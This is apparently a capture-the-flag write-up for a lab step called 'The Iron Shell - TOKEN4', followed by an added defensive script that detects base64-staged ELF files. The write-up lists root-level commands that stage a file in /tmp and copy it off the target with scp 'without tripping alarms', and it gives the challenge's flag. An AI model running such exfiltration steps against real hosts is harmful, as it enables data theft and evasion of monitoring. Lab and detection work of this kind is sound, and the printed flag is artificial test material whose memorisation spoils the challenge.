The Iron Shell - TOKEN4
Base URL: http://target:8000
Background
The final task is to exfiltrate a sensitive executable (flag.txt) without
tripping alarms. To avoid running it on the target, base64 it, copy it
off-host, then execute locally to reveal the token.
From Nothing to Working
Start point: root access is already available from the previous step.
Iterations:
- Locate the sensitive file (flag.txt) and note it is executable (rwx------).
- Base64-encode it to avoid executing it on the target.
- scp the encoded blob, decode locally, then run the binary to print the token.
Goal
Safely exfiltrate the sensitive file and run it off-host to obtain the token.
Commands
On target (as root):
ls -l flag.txt
base64 flag.txt > /tmp/flag.txt.b64
Copy off-host and decode locally:
scp root@target:/tmp/flag.txt.b64 .
base64 -d flag.txt.b64 > flag.txt
chmod +x flag.txt
./flag.txt
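Seen from the defender's side, the on-target step leaves a base64 text file in /tmp whose leading characters decode to an executable header. The script below is an added example, not part of the original writeup: it scans a directory for files that decode to the ELF magic bytes. It assumes flag.txt is an ELF binary and that GNU coreutils is available; the function names and sample files are constructed for illustration.

```shell
#!/bin/sh
# Added example (not from the original writeup): detect base64-staged executables.
# Assumption: the staged blob is a base64-encoded ELF binary.

# Print the hex of the first 4 bytes obtained by decoding a file's leading base64 text.
decoded_magic() {
    head -c 8 "$1" 2>/dev/null | base64 -d 2>/dev/null | head -c 4 | od -An -tx1 | tr -d ' \n'
}

# Return 0 when the decoded content starts with the ELF magic (7f 45 4c 46).
is_b64_elf() {
    [ "$(decoded_magic "$1")" = "7f454c46" ]
}

# List regular files directly under a directory that are base64-encoded ELF.
scan_staging() {
    dir=$1
    for f in "$dir"/*; do
        [ -f "$f" ] || continue
        if is_b64_elf "$f"; then
            printf '%s\n' "$f"
        fi
    done
}

# Constructed sample data: a fake 8-byte ELF header encoded the same way as in
# the commands above, plus a benign text file that must not be reported.
make_samples() {
    d=$(mktemp -d)
    printf '\177ELF\002\001\001\000' | base64 > "$d/flag.txt.b64"
    printf 'plain log line\n' > "$d/notes.txt"
    printf '%s\n' "$d"
}

samples=$(make_samples)
scan_staging "$samples"   # reports only the constructed flag.txt.b64
rm -rf "$samples"
```

On a real host, point scan_staging at /tmp or another world-writable directory and run it on a schedule or from a file-creation audit hook.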
Expected Output
Look for:
PCCC{flag4_17_0727}
Learn More
- https://owasp.org/Top10/A02_2021-Cryptographic_Failures/
- https://cwe.mitre.org/data/definitions/200.html